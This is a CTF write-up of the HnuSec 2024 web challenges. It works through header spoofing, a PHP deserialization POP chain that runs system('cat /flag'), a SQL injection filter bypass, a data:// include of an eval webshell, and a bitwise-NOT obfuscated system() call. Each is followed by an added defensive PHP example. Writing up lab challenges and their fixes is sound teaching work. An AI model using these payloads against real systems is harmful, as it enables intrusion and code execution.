HnuSec 2024 CTF

Results

Two second bloods and one first blood; one challenge had a problem with the task itself, so I couldn't take it down.
The challenge author said to count it as an AK (all kill) for me, fine.

What Do You Want!


Looks like it's the robots.txt protocol.

So let's visit /The_Deep_Ends and take a look.

Then it's XFF, but unfortunately that doesn't work; brute-forcing with Burp showed it's X-Client-IP: 127.0.0.1.
After that it's a series of HTTP header things, so I'll just put the payload here. The Via header was quite a torment: I'd never seen it before, searched for a long time, and kept getting it wrong because I forgot to add www to the Wukong official site path. It nearly made me cough up blood.

Visit /The_Golden_Light

Then it's simply passing a parameter in a cookie.
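As an added example (not part of the writeup or the challenge), here is the pattern behind the X-Client-IP: 127.0.0.1 bypass in PHP, next to an IP check that only honours forwarding headers from an operator-controlled proxy. The proxy address and the request array are constructed for this example.

```php
<?php
// Added example, not part of the challenge. The writeup passes the
// "must come from 127.0.0.1" gate by supplying X-Client-IP; this contrasts
// an IP check that reads client-controlled headers with one that only
// trusts them behind a known proxy. Header values are constructed.

// The pattern the challenge appears to use: whichever header the client
// sends wins, so anyone can claim to be localhost.
function client_ip_trusting(array $server): string {
    foreach (['HTTP_X_CLIENT_IP', 'HTTP_X_FORWARDED_FOR', 'HTTP_X_REAL_IP'] as $h) {
        if (!empty($server[$h])) {
            return trim(explode(',', $server[$h])[0]);
        }
    }
    return $server['REMOTE_ADDR'];
}

// Hardened: REMOTE_ADDR comes from the TCP connection, not the request.
// A forwarding header is honoured only when REMOTE_ADDR is a proxy we run.
const TRUSTED_PROXIES = ['10.0.0.2'];   // assumption for this example

function client_ip_hardened(array $server): string {
    $peer = $server['REMOTE_ADDR'];
    if (in_array($peer, TRUSTED_PROXIES, true) && !empty($server['HTTP_X_FORWARDED_FOR'])) {
        // The rightmost hop is the one our proxy appended; earlier entries
        // were written by whoever sent the request and are hearsay.
        $hops = array_map('trim', explode(',', $server['HTTP_X_FORWARDED_FOR']));
        return end($hops);
    }
    return $peer;   // X-Client-IP and friends are ignored entirely
}

// Constructed request: a remote client claiming to be localhost.
$req = ['REMOTE_ADDR' => '203.0.113.9', 'HTTP_X_CLIENT_IP' => '127.0.0.1'];
var_dump(client_ip_trusting($req) === '127.0.0.1');   // the gate is fooled
var_dump(client_ip_hardened($req) === '127.0.0.1');   // the header is ignored
```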

ez_serialize

On entering there's a hint; it feels like a cookie check.

Opening HackBar confirms it; change the value in the cookie to admin and you're through.

Visiting /hhhheelllloooo.php gives the source:

<?php
highlight_file(__FILE__);
error_reporting(0);

class WOWO{
    private $nano;
    public $hahaha;
    public $evn;

    public function __destruct()
    {
        $this->evn->do='do you know serialize?';
    }

    public function __get($a){
        echo $this->hahaha;
    }
}

class Soga{
    public $asdj;
    public $grape;

    public function __invoke()
    {
        return $this->asdj->nano;
    }
    public function __toString()
    {
        $this->grape='123';
        return 'are you sure?';
    }
}

class H{
    public $a ;
    public $b ;

    public function __toString()
    {
        $Love=$this->a;
        $Love('',$this->b);
        return "it's too esay,yet?";
    }
}

class NANI{
    public $lal;
    public $so;

    public function __set($star,$bob){
        $str=$this->lal;
        $str();
    }
}

class Dman{
    public $apple;
    public $strawberry;

    public function __invoke(){
        return $this->apple;
    }

    public function __get($a){
        $des=$this->strawberry;
        $des();
    }
}

class Hnu{
    public $sun='HnuSec is very good';
    public $setad='do you think so?';

    public function __destruct(){
        if($this->setad='yes'){
            echo 'Thank you,have a fun.';
        }
    }
}

if(isset($_POST['Hnu'])){
    $cmd=$_POST['Hnu'];
    unserialize(base64_decode($cmd));
}

?>

Now build the POP chain. Below is the one I constructed; note it is written in reverse order.
H_tostring->WOWO_get->Soga_invoke->NANI_set->WOWO_destruct
None of the other magic methods has a call with two or more controllable parameters, so only the __toString in class H is left.
So here is my payload:

<?php
//H_tostring->WOWO_get->Soga_invoke->NANI_set->WOWO_destruct
class WOWO
{
    private $nano;
    public $hahaha;
    public $evn;
}
class Soga
{
    public $asdj;
    public $grape;
}
class H
{
    public $a="create_function";
    public $b="}system('cat /flag');//";
}
class NANI
{
    public $lal;
    public $so;
}
$a = new WOWO();
$a->evn = new NANI();
$a->evn->lal = new Soga();
$a->evn->lal->asdj = new WOWO();
$a->evn->lal->asdj->hahaha = new H();
echo base64_encode(serialize($a));
?>

Successfully got the flag.
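An added example, not the challenge's code or the writeup's payload: the same hhhheelllloooo.php entry point with unserialize() restricted so that none of the page's classes can be revived, plus a pre-check that rejects object tokens before deserialization. The serialized sample is constructed.

```php
<?php
// Added example, not part of the challenge or the writeup's payload. Two
// defensive changes to the hhhheelllloooo.php entry point:
//  1. a pre-check that rejects any payload carrying an object token, and
//  2. unserialize() with allowed_classes => false, so even a payload that
//     slips past (1) revives no class: WOWO, Soga, H, NANI and the rest come
//     back as __PHP_Incomplete_Class and none of their magic methods runs.
// The class definitions are omitted on purpose: with allowed_classes => false
// they are never instantiated, whether or not they are loaded.

function contains_object_token(string $serialized): bool {
    // 'O:' (object) and 'C:' (custom-serialized class) are the only tokens
    // that bring a class, and with it a magic method, into play. The check
    // is deliberately conservative: a string value containing the token is
    // rejected too.
    return preg_match('/(^|[;{])[OC]:\d+:"/', $serialized) === 1;
}

function safe_unserialize(string $b64) {
    $raw = base64_decode($b64, true);       // strict mode: reject non-base64
    if ($raw === false || contains_object_token($raw)) {
        return null;                        // refuse (and log, in real code)
    }
    return unserialize($raw, ['allowed_classes' => false]);
}

// Constructed sample in the shape of the writeup's chain: a WOWO whose
// evn property is a NANI, so that __destruct would reach NANI::__set.
$attack = base64_encode('O:4:"WOWO":1:{s:3:"evn";O:4:"NANI":0:{}}');
var_dump(safe_unserialize($attack));        // rejected by the pre-check

// The same bytes fed straight to the restricted unserialize(): the outer
// object is revived as __PHP_Incomplete_Class, so no __destruct fires.
$obj = unserialize(base64_decode($attack), ['allowed_classes' => false]);
var_dump(get_class($obj));

// Legitimate data (a plain array) still round-trips unchanged.
$ok = base64_encode(serialize(['role' => 'guest', 'id' => 7]));
var_dump(safe_unserialize($ok));
```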

谢谢皮蛋🥚 (Thank You Pidan 🥚)

On entering I just passed a 1 and got an error message, so it looks like numeric injection.

Then follow the usual steps:
Input 1 group by 2# to find the number of columns // two columns
Input 1 union select 1,2# and the error is as follows:

Guessing that union is being replaced, so:
Input -11 ununionion select 1,2# to find the echo positions
Input -11 ununionion select 1,group_concat(table_name) from information_schema.tables where table_schema=database()# to dump table names; = turns out to be filtered, so bypass it:
Input -11 ununionion select 1,group_concat(table_name) from information_schema.tables where table_schema like database()#

Input -11 ununionion select 1,group_concat(column_name) from information_schema.columns where table_schema like database()# to dump column names

From the combination, each table has three columns.
Input -11 ununionion select 1,group_concat(des,'~',value) from F149#
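An added example, not from the challenge: the keyword-stripping filter that ununionion defeats, beside a typed, parameterized lookup that does not depend on a blacklist. It assumes the pdo_sqlite extension; the F149 rows are constructed sample data.

```php
<?php
// Added example, not from the challenge. Contrasts the keyword-stripping
// filter the writeup defeats with a fix that does not rely on a blacklist.
// Table and column names (F149, des, value) are the ones the writeup dumps;
// the rows are constructed sample data.

// The kind of filter the challenge appears to use: strip "union" once.
// "ununionion" collapses straight back to "union".
function strip_filter(string $in): string {
    return str_ireplace('union', '', $in);
}

// Defensive version: the id is numeric by contract, so enforce that type
// before it gets anywhere near SQL, then bind it as a parameter.
function lookup_by_id(PDO $db, string $userInput): ?array {
    $id = filter_var($userInput, FILTER_VALIDATE_INT);
    if ($id === false) {
        return null;                   // "-11 ununionion ..." never reaches SQL
    }
    $stmt = $db->prepare('SELECT des, value FROM F149 WHERE id = :id');
    $stmt->execute([':id' => $id]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE F149 (id INTEGER PRIMARY KEY, des TEXT, value TEXT)');
$db->exec("INSERT INTO F149 VALUES (1, 'hint', 'nothing here'), (2, 'flag', 'flag{constructed-sample}')");

$payload = '-11 ununionion select 1,group_concat(des,\'~\',value) from F149#';

// Blacklist result: the keyword survives, so the query is still attacker-shaped.
var_dump(strip_filter($payload));

// Typed + parameterized: the payload is rejected outright ...
var_dump(lookup_by_id($db, $payload));
// ... while a legitimate numeric id still works.
var_dump(lookup_by_id($db, '1'));
```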

海北大学后台管理系统Plus (Haibei University Backend Management System Plus)

Looking at the source reveals the username.

Just brute-force with the dictionary the challenge provides; the password is obvious.

Once in, type anything.


The password is hidden in the source; base64-decode it in HackBar and enter it.

This gives the address /Ewoji/final0012llsnn.php; visiting it shows a file-inclusion challenge with the following source:

<?php
highlight_file(__FILE__);
function waf(){
    if(preg_match("/<|\?|php|>|echo|filter|system|file|%|&|=|`|eval/i",$_GET['data'])){
        die("dangerous function detect!");
    };
}
if(isset($_GET['phpinfo'])){
    phpinfo();
}
waf();
include $_GET['data'];
?>

filter is banned and the parameter is named data, so I guessed

data://
the data stream wrapper, which passes data in the corresponding format. It lets the user control the input stream; when it is combined with an include function, the user-supplied data:// stream is executed as a PHP file.

Lots of things are banned too, so to execute commands the only option is the base64-encoded form.
Pass in ?data=data://text/plain;base64,<script language="php">eval($_POST['cmd']); </script>
(Left unencoded here so everyone can read it clearly; in actual use it must be base64-encoded, same below.)

After passing it in, the backend eats one '>', so I guessed there's a WAF.
So pass in ?data=data://text/plain;base64,<?php @eval($_POST['cmd']);?>>

After that just use cat to read the flag.
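An added example, not from the challenge: why waf()'s regex cannot see a base64 data:// payload, and the whitelist-style include that replaces it. The page map and its files are an assumption for this example.

```php
<?php
// Added example, not part of the challenge. Contrasts the challenge's
// blacklist-then-include with an include that never takes a path from
// the request. The page map below is an assumption for this example.

// The challenge's check as a function: a substring blacklist on the raw
// parameter value.
function waf_matches(string $data): bool {
    return preg_match("/<|\?|php|>|echo|filter|system|file|%|&|=|`|eval/i", $data) === 1;
}

// Fixed: the request supplies a name, not a path. Wrappers such as
// data://, traversal and encoding tricks have nothing to act on.
const PAGES = [
    'home'  => __DIR__ . '/pages/home.php',   // assumed files
    'about' => __DIR__ . '/pages/about.php',
];

function resolve_page(?string $name): ?string {
    return ($name !== null && array_key_exists($name, PAGES)) ? PAGES[$name] : null;
}

// The writeup's payload: the PHP source sits inside the base64 part, so the
// parameter itself carries none of the banned tokens. (It is 30 bytes, so
// its base64 has no "=" padding; "=" is on the blacklist.)
$data = 'data://text/plain;base64,' . base64_encode('<?php @eval($_POST[\'cmd\']);?>>');

var_dump(waf_matches($data));       // the blacklist finds nothing to block
var_dump(resolve_page($data));      // the whitelist has no such page
var_dump(resolve_page('about'));    // a real page name resolves

// Configuration layer: with allow_url_include=Off (php.ini only, cannot be
// changed at runtime) include() refuses data:// and other remote wrappers.
var_dump(ini_get('allow_url_include'));
```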

海北大学后台管理系统 (Haibei University Backend Management System)

On entering it's the same interface as the Plus version above, except this time everything is in the source.
The second stage is likewise: look at the source to find the base64-encoded password.
Same steps as Plus, so no further explanation.
Visit /Ewoji/final.php, which shows the source:

<?php
// I'm He Chenguang. I don't want an enemy who picks up my backdoor on the battlefield to be able to use it directly, so I decided to add some restrictions
highlight_file(__FILE__);
error_reporting(0);
if(isset($_POST['num1']) && isset($_POST['num2'])){

    $num1 = $_POST['num1'];
    $num2 = $_POST['num2'];

    if( $num1!=$num2 && md5($num1) === md5($num2)){
        echo "继续吧";

        if(isset($_GET['cmd'])){
            $cmd = $_GET['cmd'];
            if(!preg_match("/flag|system|php|cat|\*|\_|tac|less|more|\.| |\'/i", $cmd)){
                eval($cmd);
            }

        }
    }else{
        echo "nonono";
    }
}
?>

For the md5 check, just go with the array bypass.

Looking at it, '~' isn't filtered, so go with the bitwise-NOT bypass; script below (remember to change it before use).

<?php
$a='assert';
echo urlencode(~$a);
echo "<br/>";
$b='(eval($_POST[cmd]))';
echo urlencode(~$b);
?>

?cmd=(~%8C%86%8C%8B%9A%92)(~%93%8C%DF%D0);
which is actually system("ls /");

Input ?cmd=(~%8C%86%8C%8B%9A%92)(~%9C%9E%8B%DF%D0%99%99%99%99%93%9E%98);
which is actually system("cat /fffflag");
and get a long string:

继续吧恭喜你找到flag!我负责任的告诉你,secret:后面的字符是你需要的东西,但EWOJI五个大写字符不是你需要的东西EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEsecret:flWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWsecret:ag{OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOsecret:salJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJsecret:lasjIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIsecret:lsdEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEsecret:13-WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWsecret:mOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOsecret:ccJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJsecret:abIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIsecret:obEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEsecret:2WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWsecret:4OOOOOOOOOOOOOOOOOOOOOOOOOsecret:zzJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJsecret:mkIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIsecret:bxEEEEEEEEEEEEEEEEEEEEEEEsecret:2-WWWWWWWWWWWWWWWsecret:zxOOOOOOOOOOOOOOOOOOOOOOOOOOOOOsecret:dsJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJsecret:gohIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIsecret:dsxEEEEEEEEEEEEEEEEEEEEEsecret:zxcWWWWWWWWWWWWsecret:zxwOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOosecret:0-JJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJsecret:ddxIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIsecret:zxwEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEsecret:12sWWWWWWWWWWWWWWWWsecret:dsxOOOOOOOOOOOOOOOOOOOOsecret:asxJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJsecret:zIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIsecret:zkEEEEEEEEEEEEEEEEEEEEEEEEEEEEEsecret:f-WWWWWWWWWWWWWWWWWWWWWWsecret:awOOOOOOOOOOOOsecret:xfJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJsecret:axdIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIsecret:amdEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEsecret:p2-WWWWWWWWWWWWWWsecret:xxOOOO
OOOOOOOOOOOOOOOOOOOOsecret:zJJJJJJJJJJJJJJJJJJJJsecret:moIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIsecret:yhEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEsecret:aaWWWWWWWWWWWWsecret:tOOOOOOOOOOOOOOOOsecret:23JJJJJJJJJJJJJJJJJsecret:qw-IIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIsecret:asdEEEEEEEEEEEEEEEEEEEEsecret:ghWWWWWWWWWWWWWWWWsecret:zxcOOOOOOOOOOOOOOOOOOOOOOOOOOOOOsecret:22JJJJJJJJJJJJJJJJJJJJJJsecret:czxcIIIIIIIIIIIIIIIIIIIIIIIIIIsecret:owmEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEsecret:231WWWWWWWWWWWWWsecret:bye!} 

Write a script to delete the extra characters; script below:

<?php
$string = "EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEsecret:flWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWsecret:ag{OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOsecret:salJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJsecret:lasjIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIsecret:lsdEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEsecret:13-WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWsecret:mOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOsecret:ccJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJjsecret:abIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIiisecret:obEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEsecret:2WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWsecret:4OOOOOOOOOOOOOOOOOOOOOOOOOsecret:zzJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJsecret:mkIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIsecret:bxEEEEEEEEEEEEEEEEEEEEEEEsecret:2-WWWWWWWWWWWWWWWsecret:zxOOOOOOOOOOOOOOOOOOOOOOOOOOOOOsecret:dsJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJsecret:gohIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIisecret:dsxEEEEEEEEEEEEEEEEEEEEEsecret:zxcWWWWWWWWWWWWsecret:zxwOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOosecret:0-JJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJsecret:ddxIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIsecret:zxwEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEsecret:12sWWWWWWWWWWWWWWWWsecret:dsxOOOOOOOOOOOOOOOOOOOOsecret:asxJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJsecret:zIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIsecret:zkEEEEEEEEEEEEEEEEEEEEEEEEEEEEEsecret:f-WWWWWWWWWWWWWWWWWWWWWWsecret:awOOOOOOOOOOOOsecret:xfJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJsecret:axdIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIsecret:amdEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEsecret:p2-WWWWWWWWWWWWWWsecret:xxOOOOOOOOOOOOOOOOOOOOOOOOsecret:zJJJJJJJJJJJJJJJJJJJ
Jsecret:moIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIisecret:yhEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEsecret:aaWWWWWWWWWWWWsecret:tOOOOOOOOOOOOOOOOsecret:23JJJJJJJJJJJJJJJJJsecret:qw-IIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIsecret:asdEEEEEEEEEEEEEEEEEEEEsecret:ghWWWWWWWWWWWWWWWWsecret:zxcOOOOOOOOOOOOOOOOOOOOOOOOOOOOOsecret:22JJJJJJJJJJJJJJJJJJJJJJsecret:czxcIIIIIIIIIIIIIIIIIIIIIIIIIIsecret:owmEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEsecret:231WWWWWWWWWWWWWsecret:bye!}";
$pat = "/secret:|[EWOJI]/";
$re = "";
$new = preg_replace($pat, $re, $string);
echo $new;
?>

Run the script to get the flag.
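An added example, not from the challenge: the two gates in final.php (the md5 comparison and the eval blacklist) with the reason each falls to the writeup's technique, a type-checked md5 gate, and a detection rule for the bitwise-NOT obfuscation. The ?cmd= value is the one from the writeup; the other inputs are constructed.

```php
<?php
// Added example, not part of the challenge. Shows why final.php's two gates
// fail and what a defender can do about each.

// Gate 1: $num1!=$num2 && md5($num1)===md5($num2). On PHP versions where
// md5() still accepts an array (before 8.0) it returns null for any array,
// so num1[]=1&num2[]=2 yields two different values with "identical" hashes.
function md5_gate_hardened($num1, $num2): bool {
    if (!is_string($num1) || !is_string($num2)) {
        return false;                       // arrays never reach md5()
    }
    // Same logic as the challenge, but on strings only and in constant time.
    return $num1 !== $num2 && hash_equals(md5($num1), md5($num2));
}

// Gate 2: a substring blacklist over code that will be eval()'d. Every byte
// of ~"system" is >= 0x80, so the word is not there for the regex to find;
// PHP applies ~ again at runtime and gets the function name back.
const EVAL_BLACKLIST = "/flag|system|php|cat|\*|\_|tac|less|more|\.| |\'/i";

function blacklist_matches(string $cmd): bool {
    return preg_match(EVAL_BLACKLIST, $cmd) === 1;
}

// Detection: a literal ~ followed by a run of high-bit bytes is the
// signature of this obfuscation and does not occur in legitimate input.
function looks_like_not_obfuscation(string $cmd): bool {
    return preg_match('/~[\x80-\xff]{2,}/', $cmd) === 1;
}

// The writeup's ?cmd= value, URL-decoded (system("ls /") in disguise).
$cmd = urldecode('(~%8C%86%8C%8B%9A%92)(~%93%8C%DF%D0);');

var_dump(blacklist_matches($cmd));          // the blacklist lets it through
var_dump(looks_like_not_obfuscation($cmd)); // the detection rule catches it
var_dump(~substr($cmd, 2, 6));              // recovers the hidden name

// Gate 1 with the array trick vs. with plain strings:
var_dump(md5_gate_hardened(['1'], ['2']));  // rejected before md5() runs
var_dump(md5_gate_hardened('abc', 'abc'));  // equal strings: gate stays shut
```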


http://example.com/2024/08/17/HnuSec/
Author: unjoke
Published: 17 August 2024